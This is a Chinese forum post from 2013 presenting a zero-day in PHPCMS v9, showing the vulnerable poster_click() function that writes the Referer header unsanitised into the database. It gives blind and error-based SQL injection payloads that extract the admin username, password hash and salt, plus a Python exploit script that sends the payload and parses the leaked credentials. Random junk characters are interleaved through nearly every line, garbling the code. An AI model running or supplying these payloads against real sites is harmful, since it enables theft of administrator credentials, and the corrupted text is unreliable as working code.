有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:: `) s s2 _, `4 R6 O
. x0 u9 x% F2 `, i3 z% B6 C9 I
问题函数\phpcms\modules\poster\index.php5 q2 n4 H" g# j+ r+ t
S1 A: M# u+ K
public function poster_click() {
& T8 ^0 \( E* R7 S$id = isset($_GET['id']) ? intval($_GET['id']) : 0;$ g4 ^$ z3 y, m8 P* Z7 K0 L" t8 I
$r = $this->db->get_one(array('id'=>$id));; r4 \4 U& i7 K; t
if (!is_array($r) && empty($r)) return false;
: F) h$ O8 [% s" q$ip_area = pc_base::load_sys_class('ip_area');6 n& A8 z1 U3 l: |# X# M+ W! r t3 |
$ip = ip();# e8 i& n, i- @$ a; {0 m
$area = $ip_area->get($ip);
{. f9 t. f% W/ i$username = param::get_cookie('username') ? param::get_cookie('username') : '';
) s/ ~/ s* \9 w0 z- H$ Pif($id) {# F+ B6 F- F4 o( e% d
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();1 N) V; p2 m. M5 i) u% V
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));. Y: v" g! A" t7 ^* x0 S+ I" R
}, ?4 Z7 ?2 T' a& n* U F' x
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
3 I* M( n4 D7 b/ m# E; w$setting = string2array($r['setting']);
4 }7 s1 r2 f9 d+ Vif (count($setting)==1) {. N# C6 ]! a! R7 u2 o
$url = $setting['1']['linkurl'];, n% y' i4 f x+ `4 U+ N7 T
} else {
: G2 _+ n6 z7 M6 ^3 k1 S6 L2 w$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];# t4 j$ p0 ~3 C
}
4 v2 V- G4 Y. W6 R/ `% Pheader('Location: '.$url);4 Q' d& O$ @2 ]6 \+ f/ W. D
}
; J5 R' \4 I s3 R% ]/ C. r1 B" y* _) d; R+ O: g
& O# V& V; K+ b' y [
6 J. H9 w. f: @& D, l
利用方式:
$ D' \5 P1 Z6 T: J. b
8 P( q( Y: `. d; T9 p8 e5 @1、可以采用盲注入的手法:
/ L! G# k- H/ G+ I
' h/ |" T" i& @1 [/ lreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#& p3 X" S3 l3 J; E- D3 {% t
' X" [/ I' s! h) y# h
通过返回页面,正常与否一个个猜解密码字段。- S" `: ]; F% E3 i. a0 u G2 M" {# {8 N
0 n5 I8 ?: m' m( G. P7 @- e# m
2、代码是花开写的,随手附上了:3 @) f- N' {/ b! E' F
3 g. m, ?( v6 A: j3 _1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#4 B5 u s; W' Y8 ? c. o- o& }
& ?3 Z) |' \, ^. ^ c% l$ w
此方法是爆错注入手法,原理自查。# Q+ d) L0 }5 Z Z
; n# \5 u0 e% |- m
& B% q' E) [9 y5 o Y
3 P% ?8 }) U9 n( y k* z/ d利用程序:
8 S7 p. V& x) D# f1 L$ w
/ N; V# j$ t/ m: `#!/usr/bin/env python
3 p4 k, Y! b4 y4 Bimport httplib,sys,re4 e" I0 Q( g t8 s% G" b
. T3 l' \2 j6 y; K
def attack():2 ?* W+ _: P8 Z" F& I
print “Code by Pax.Mac Team conqu3r!”5 m! w" g& M$ m' N( j# @$ l0 [
print “Welcome to our zone!!!”
2 j+ |- r6 m4 @4 w% q9 p7 w7 w, turl=sys.argv[1]
5 W6 ^! C" |2 K) b& q0 F' y! l+ _paths=sys.argv[2]
" [; N! M/ g4 [7 O* W* h" p* n0 Uconn = httplib.HTTPConnection(url)
! i6 t6 A4 P3 T1 q+ |i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 R' J0 V) Z0 E! m. }5 j( x( O
“Accept”: “text/plain”,
! |" m) r6 ?, p8 s% Z“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
+ v b$ b9 o0 `6 ]" @2 w- n, yconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), Q9 [9 B6 u2 D/ |8 B
r1 = conn.getresponse()6 t ]* g$ R& O! F% n
datas=r1.read()+ b0 U6 y5 u" u: z3 [
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
f5 ^- X3 C5 nprint datas[0]
# O9 }$ z/ V! C8 k# T/ g- J, ^conn.close()/ p" w% _* s' _ u# q4 Q; Y/ }5 o, H
if __name__==”__main__”:
4 u0 K; D+ ^$ L+ b* Qif len(sys.argv)<3:: Q8 g% x$ r1 [) o, a) g3 g6 Z
print “Code by Pax.Mac Team conqu3r”, ~$ Y1 u" J, A
print “Usgae:”: Q: w1 \/ b) O' ?
print “ phpcmsattack.py www.paxmac.org /”0 I) Q/ C! |0 m+ l' k& M
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
: {! `' c/ G5 F! M3 Esys.exit(1)
?9 W4 x: ?% u4 M" W7 c# Kattack()
( s9 Z# i/ t) ?2 h# i$ z! W
! @( l( M8 j) {# Y9 S4 Q6 N6 Y |
发表于 2013-1-11 21:01:00
收藏
支持
反对